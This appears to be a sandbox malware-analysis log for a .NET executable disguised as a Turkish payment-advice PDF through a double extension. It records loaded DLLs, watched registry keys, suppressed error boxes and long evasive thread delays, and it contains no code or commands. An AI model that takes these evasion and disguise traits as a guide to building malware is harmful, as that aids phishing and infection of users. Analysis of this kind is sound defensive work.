Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3712724637.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000000.1250643822.0000000000054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDwgkbv.exe. vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exeBinary or memory string: OriginalFilenameDwgkbv.exe. vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal80.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMutant created: NULL
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: #U00d6deme tavsiyesi.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: #U00d6deme tavsiyesi.pdf.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: gpapi.dllJump to behavior
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.exeStatic PE information: #U00d6deme tavsiyesi.pdf.exe
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 680000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 22E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 42E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599438Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599203Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599094Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598969Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598735Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598610Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598162Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598046Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597935Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597812Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597703Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597594Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597110Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596985Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596735Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596610Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596110Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595985Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595731Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595625Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595516Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595392Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595090Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594971Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594844Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594734Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594625Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594516Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594401Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594297Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594188Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594063Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeWindow / User API: threadDelayed 8031Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeWindow / User API: threadDelayed 1799Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep count: 39 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -35971150943733603s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7732Thread sleep count: 8031 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7732Thread sleep count: 1799 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599313s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599203s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -599094s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598969s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598860s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598735s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598610s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598360s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598162s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -598046s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597935s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597812s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597594s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597360s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597235s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -597110s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596985s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596860s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596735s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596610s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596360s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596235s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -596110s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595985s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595860s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595731s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595625s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595516s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595392s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595235s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -595090s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594971s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594844s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594625s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594516s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594401s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594297s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594188s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 7728Thread sleep time: -594063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599438Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599203Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 599094Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598969Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598735Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598610Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598162Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 598046Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597935Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597812Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597703Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597594Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 597110Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596985Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596735Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596610Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596485Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596360Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 596110Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595985Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595860Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595731Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595625Jump to behavior
